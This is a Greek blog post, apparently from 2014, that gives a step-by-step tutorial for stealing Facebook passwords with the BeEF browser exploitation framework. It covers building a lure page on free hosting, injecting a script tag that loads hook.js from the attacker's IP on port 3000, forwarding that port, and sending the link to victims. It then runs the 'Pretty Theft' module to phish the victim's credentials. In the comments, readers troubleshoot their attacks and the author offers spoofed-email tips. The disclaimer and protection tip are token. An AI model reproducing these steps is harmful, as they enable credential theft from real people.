ΠΡΟΣΟΧΗ

Προσοχή! Οι οδηγοί μου είναι μόνο για εκπαιδευτικούς σκοπούς,
εφαρμόζοντας τους κακόβουλα σε τρίτους είναι με δικιά σας ευθύνη καθώς ορισμένοι απο αυτούς είναι παράνομοι

Κυριακή, 27 Απριλίου 2014

Πως κλεβουμε κωδικους Facebook (με BeEF)





Τι θα χρεαστειτε;

1Κali linux
2.BeEF (Browser explotation Framework)




 Γραφουμε σε ενα τερματικο beef-xss και θα μας ανοιξει την σελιδα του beef
η πηγαινουμε Explotation Tools και επιλεγουμε το Beef

τα κρητηρια συνδεσεις ειναι:
username:beef
password:beef

οταν τα βαλουμε θα μας παει στο menu του beef


τωρα πηγαινουμε εδω κανουμε εγραφη και επιλεγουμε new hosting


επιλεγουμε Δωρεαν και Παραγγελια


τωρα γραφουμε το ονομα που θελουμε να εχει η σελιδα μας βαζουμε ενα κωδικο και επιλεγουμε συνεχεια *επιλεξτε hol.es και οχι esy.es*


γραφουμε οτι captcha μας εμφανισει και επιλεγουμε παραγγελια


επιλεγουμε την σελιδα και  κατασκευαστης ιστοσελιδων


θα μας εμφανισει καποιο απο τα προτυπα πχ


*εσεις διαλεγετε οποιο θελετε και αναλογα ποιο πιστευετε οτι θα τραβηξει τα θυματα σας

πχ εγω επελεξα αυτο


τωρα πρεπει να βαλετε το μυαλο σας να δουλεψει και να κατασκευασετε η να γραψετε στην σελιδα κατι που να κρατησει τα θυματα σας να διαβασουνε αυτο που θα γραψετε πχ κοιταξτε πως εφτιαξα εγω την σελιδα περιπου για να μπειτε στο νοημα

μετα συμπληρωνετε το αρθρο σας κτλ

οταν τελειωσετε απλα σερνετε το καρτελακι html πχ


πατατε διπλο κλικ η επιλεγετε το μολυβακι και γραφετε
<script type=text/javascript src=http://ΧΧ.ΧΧ.ΧΧ.ΧΧ:3000/hook.js></script>
οπου χχ.χχ.χχ.χχ βαζετε την εξωτερικη σας ip για να δειτε ποια ειναι πατηστε εδω
 επιλεγουμε εφαρμογη

μετα επιλεγουμε οπως την εικονα κατω και αποθηκευουμε


πχ κοιταξτε ολοκληρωνενη την σελιδα δολος που εφτιαξα


τωρα πηγαινουμε στη σελιδα του ρουτερ μας πχ (192.168.1.1 η 192.168.1.254)
και προωθουμε την θυρα 3000 στην ip μας (εσωτερικη του υπολογιστη μας) *αν γραψετε σε  ενα τερματικο ifconfig θα δειτε ποια ειναι η εσωτερικη ip σας πχ στο ρουτερ θα πρεπει να βαλετε κατι τετοιο

για να προωθησετε... απλα πατηστε εδω βαλτε την μαρκα του ρουτερ που εχετε και ακολουθηστε τις οδηγιες
μετα για να δειτε  οτι οντως ειναι ανοικτη η θυρα πατηστε εδω
και θα δειτε οτι ειναι ενταξει

τωρα το ανεβαζουμε στο facebook σαν status η το στελνετε στο επιθυμητο θυμα σας

οταν το θυμα κοιταξει την σελιδα μας....θα διαβαζει το αρθρο
εμεις τοτε θα δουμε ενα zombie δλδ ενωμενο χρηστη
πχ


τωρα επιλεγουμε το θυμα(zombie) και βλεπουμε διαφορες πληροφοριες


μετα επιλεγουμε commands -Social Engineering-Prety thieft και execute


στο θυμα μας θα του εμφανιστει αυτο


οταν βαλει τον κωδικο του τοτε

θα μας εμφανισει τα αποτελεσματα


δλδ nickthesail0r@fetamail.com και κωδικος xazos56


Πως θα προστατευτειτε;

Απλα ποτε μην βαζετε τον κωδικο σας εκτος facebook



6 σχόλια:

Hlias tser είπε...

Γεια σου Nick έχω ένα πρόβλημα και το έχω προσπαθήσει πάρα πολλές φόρες και δεν κατάφερα τίποτα..Λοιπόν τα έχω κάνει όλα όσα λες όλα μια χαρά άπλα στο Beef δεν μου βγάζει τίποτα όταν μπαίνει κάποιος.. ενώ τα υπόλοιπα τα έχω κάνει ακριβώς έτσι όπως τα έκανες εσύ..

nickthesail0r είπε...

κοιτα στο beef εκει που λεει demo hook page.αν πατησεις εκει θα δεις οτι εχεις zombie εσενα.αν δεν σου εμφανιζει κατι τοτε κατι εκανες λαθος.αν σου εμφανιζει τοτε προωθησε την θυρα 3000 στην τοπικη ip σου δλδ 192.168.χ.χ και στο <script type κτλ θα βαλεις την εξωτερικη σου ip τη οποια θα την βρεις πχ www.whatismyip.com η στις ρυθμισεις του ρουτερ σου.

zobzero zourna είπε...

Το έχω κάνει στο τοπικό δίκτυο και δουλεύει μια χαρά..ενώ όταν βάζω την εξωτερική ip και ανοίγω το πορτ και το τεστάρω κανονικά και μου λέει ότι είναι ανοικτό.. όταν όμως πάω να μπω στην σελίδα μου δεν μου βγάζει ότι υπάρχει ενωμένος χρήστης.. Δεν μπορώ να καταλάβω τη φταίει..

nickthesail0r είπε...

κατι γινεται με την προωθηση θυρας σου εφοσον σου δουλευει σε τοπικο...σιγουρα βαζεις την εξωτερικη σου ip οταν την στελνεις? http://127.0.0.1:3000/demos/basic.html σε αυτο το link θα αντικαταστησεις το 127.0.0.1 με την εξωτερικη σου ip.εφου εχεις ξεκινησει το beef

jasmin kats είπε...

Καλημερα Νικο θελω την βοηθεια σου σε παρακαλω πολυ. Θελω να μου πεις πως στελνω με e-mail την σελιδα που εφτιαξα γιατι δεν θελω να την ανεβασω μπορεις να μου πεις με ποιον τροπο γινετε αυτο σε παρακαλω πολυ. Σε ευχαριστω πολυ.

nickthesail0r είπε...

απλα στελνεις το email και βαζεις τον συνδεσμο στο κειμενο.βεβαια αν θες μπορεις να κοιταξεις σε ενα παλιοτερο οδηγο μου που στελνεις email και βαζεις οτι θες για αποστολεα.αν θυμαμαι καλα λεγεται "καντε πλακα σε φιλους και γνωστους στελνωντας του email"
αν θες να επικοινωνεις αμεσα υπαρχει σελιδα www.facebook.com/nickthesail0r.gr